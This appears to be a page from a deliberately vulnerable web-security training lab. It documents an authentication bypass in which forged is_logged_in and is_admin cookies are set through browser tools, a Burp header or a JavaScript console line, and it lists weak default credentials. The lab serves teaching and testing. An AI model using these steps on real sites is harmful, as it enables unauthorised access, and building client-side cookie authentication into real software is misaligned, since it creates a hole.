โ† Back to Dashboard

Login

Current Cookies:

Array ( )

Session Data:

Array ( )

๐ŸŽฏ Vulnerability Info

Type: Authentication Bypass

Severity: Critical

๐Ÿ’ก How to Exploit

  • Authentication relies on client-side cookies
  • Cookies can be modified using browser dev tools
  • No server-side verification of cookie values

๐Ÿงช Exploitation Steps

  1. Open browser Developer Tools (F12)
  2. Go to Application โ†’ Cookies
  3. Add cookie: is_logged_in=true
  4. Add cookie: is_admin=true
  5. Refresh the page

๐Ÿ”ง Burp Suite Method

1. Intercept any request 2. Add header: Cookie: is_logged_in=true; is_admin=true 3. Forward the request

๐Ÿ“ Using JavaScript Console

document.cookie = "is_logged_in=true; path=/"; document.cookie = "is_admin=true; path=/"; location.reload();

๐Ÿ“š Valid Credentials

  • admin / admin123 (admin role)
  • user / user123 (user role)